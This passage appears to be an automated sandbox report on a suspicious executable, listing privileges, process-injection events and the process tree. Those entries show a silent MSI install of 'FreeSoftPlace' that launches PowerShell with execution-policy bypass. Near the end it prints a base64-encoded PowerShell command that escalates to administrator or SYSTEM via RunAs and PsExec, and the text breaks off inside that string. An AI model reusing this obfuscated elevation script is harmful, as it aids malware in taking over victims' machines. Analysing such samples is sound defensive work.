Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3260 wrote to memory of 2564 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3260 wrote to memory of 2564 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3260 wrote to memory of 2564 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 736 wrote to memory of 2112 N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe C:\Windows\SysWOW64\msiexec.exe
PID 736 wrote to memory of 2112 N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe C:\Windows\SysWOW64\msiexec.exe
PID 736 wrote to memory of 2112 N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe C:\Windows\SysWOW64\msiexec.exe
PID 3260 wrote to memory of 4552 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3260 wrote to memory of 4552 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3260 wrote to memory of 4552 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4552 wrote to memory of 1248 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 4552 wrote to memory of 1248 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1248 wrote to memory of 4668 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1248 wrote to memory of 4668 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4668 wrote to memory of 2680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\whoami.exe
PID 4668 wrote to memory of 2680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\whoami.exe
PID 4552 wrote to memory of 680 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 4552 wrote to memory of 680 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 680 wrote to memory of 2684 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 680 wrote to memory of 2684 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4552 wrote to memory of 2136 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 4552 wrote to memory of 2136 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 1584 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 1584 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4552 wrote to memory of 828 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 4552 wrote to memory of 828 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 828 wrote to memory of 5000 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 828 wrote to memory of 5000 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4552 wrote to memory of 3444 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 4552 wrote to memory of 3444 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 3444 wrote to memory of 3464 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3444 wrote to memory of 3464 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4552 wrote to memory of 3732 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 4552 wrote to memory of 3732 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 3732 wrote to memory of 460 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3732 wrote to memory of 460 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4992 wrote to memory of 2868 N/A C:\Windows\System32\control.exe C:\Windows\system32\rundll32.exe
PID 4992 wrote to memory of 2868 N/A C:\Windows\System32\control.exe C:\Windows\system32\rundll32.exe
PID 2100 wrote to memory of 4968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 4968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\New Compressed (zipped) Folder.zip"

C:\Windows\system32\fontdrvhost.exe

"fontdrvhost.exe"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap24083:256:7zEvent10066 -tzip -sae -- "C:\Users\Admin\Desktop\New Compressed (zipped) Folder\c788100411c38388afc3438dccc05297ac7a77083f579e4a7e8d6e1479214fde.zip"

C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe

"C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding C9345F958E073D9A352901F311135479 C

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i C:\Users\Admin\AppData\Local\Temp\FreeSoftPlace\2023.11.06\96C4929\FreeSoftPlace.msi MSIINSTALLPERUSER=1 ALLUSERS=2 /qn AI_SETUPEXEPATH="C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe" SETUPEXEDIR="C:\Users\Admin\Desktop\New Compressed (zipped) Folder\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1700011584 " AI_EUIMSI=""

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 6FC05007F91D76C17A3DADA8AA1B62F4

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssFAE8.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiFAD6.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrFAD7.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrFAE7.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc UwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAAQwB1AHIAcgBlAG4AdABVAHMAZQByACAAQgB5AHAAYQBzAHMAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEwAbwBjAGEAbABNAGEAYwBoAGkAbgBlACAAQgB5AHAAYQBzAHMAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAE0AYQBjAGgAaQBuAGUAUABvAGwAaQBjAHkAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBpAGYAKAAtAE4AbwB0ACAAJAAoACQAKAB3AGgAbwBhAG0AaQApACAALQBlAHEAIAAiAG4AdAAgAGEAdQB0AGgAbwByAGkAdAB5AFwAcwB5AHMAdABlAG0AIgApACkAIAB7AAoAIAAgACAAIAAkAEkAcwBTAHkAcwB0AGUAbQAgAD0AIAAkAGYAYQBsAHMAZQAKAAoAIAAgACAAIABpAGYAIAAoAC0ATgBvAHQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AIABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACcAKQApACAAewAKACAAIAAgACAAIAAgACAAIAAkAEMAbwBtAG0AYQBuAGQATABpAG4AZQAgAD0AIAAiAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABCAHkAcABhAHMAcwAgAGAAIgAiACAAKwAgACQATQB5AEkAbgB2AG8AYwBhAHQAaQBvAG4ALgBNAHkAQwBvAG0AbQBhAG4AZAAuAFAAYQB0AGgAIAArACAAIgBgACIAIAAiACAAKwAgACQATQB5AEkAbgB2AG8AYwBhAHQAaQBvAG4ALgBVAG4AYgBvAHUAbgBkAEEAcgBnAHUAbQBlAG4AdABzAAoAIAAgACAAIAAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAFAAbwB3AGUAcgBTAGgAZQBsAGwALgBlAHgAZQAgAC0AVgBlAHIAYgAgAFIAdQBuAGEAcwAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAEMAbwBtAG0AYQBuAGQATABpAG4AZQAKACAAIAAgACAAIAAgACAAIABFAHgAaQB0AAoAIAAgACAAIAB9AAoACgAgACAAIAAgACQAcABzAGUAeABlAGMAXwBwAGEAdABoACAAPQAgACQAKABHAGUAdAAtAEMAbwBtAG0AYQBuAGQAIABQAHMARQB4AGUAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAJwBpAGcAbgBvAHIAZQAnACkALgBTAG8AdQByAGMAZQAgAAoAIAAgACAAIABpAGYAKAAkAHAAcwBlAHgAZQBjAF8AcABhAHQAaAApACAAewAKACAAIAAgACAAIAAgACAAIAAkAEMAbwBtAG0AYQBuAGQATABpAG4AZQAgAD0AIAAiACAALQBpACAALQBzACAAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAAYAAiACIAIAArACAAJABNAHkASQBuAHYAbwBjAGEAdABpAG8AbgAuAE0AeQBDAG8AbQBtAGEAbgBkAC4AUABhAHQAaAAgACsAIAAiAGAAIgAgACIAIAArACAAJABNAHkASQBuAHYAbwBjAGEAdABpAG8AbgAuAFUAbgBiAG8AdQBuAGQAQQByAGcAdQBtAGUAbgB0AHMAIAAKACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBXAGkAbgBkAG8AdwBTAHQAeQ